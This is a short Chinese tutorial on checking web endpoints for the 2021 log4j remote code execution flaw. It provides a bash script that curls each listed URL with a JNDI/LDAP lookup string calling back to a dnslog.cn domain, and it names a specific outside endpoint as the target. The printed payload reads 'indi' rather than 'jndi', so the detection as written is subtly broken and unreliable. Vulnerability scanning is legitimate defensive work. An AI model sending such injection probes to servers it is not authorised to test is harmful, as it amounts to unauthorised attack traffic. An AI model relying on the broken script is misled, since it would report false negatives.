一、说明
2021年底,log4j爆出了一个重量级的漏洞。漏洞被利用的话,可以在被攻击的服务器上执行任意代码。
log4j组件是java领域使用很广泛的一个软件。因此导致此漏洞的影响非常大,很多开源框架、开源产品、商业产品均被影响。
这里主要说明如何使用shell和dnslog快速检查接口是否存在漏洞。 漏洞修复方法和dnslog的介绍可以看文章尾部的参考博文。
二、检测
1.打开dnslog.cn获取检查域名
2.shell检测脚本
#!/bin/bash
while read line
do
curl -S $line?"\${indi:ldap://kx9wuo.dnslog.cn}"
done < filename.txt3.接口文件
https://www.guanshizhia.online/proxy/test/time/info
4.执行shell脚本
5.点击refuesh record,若有漏洞,则会出现解析记录。
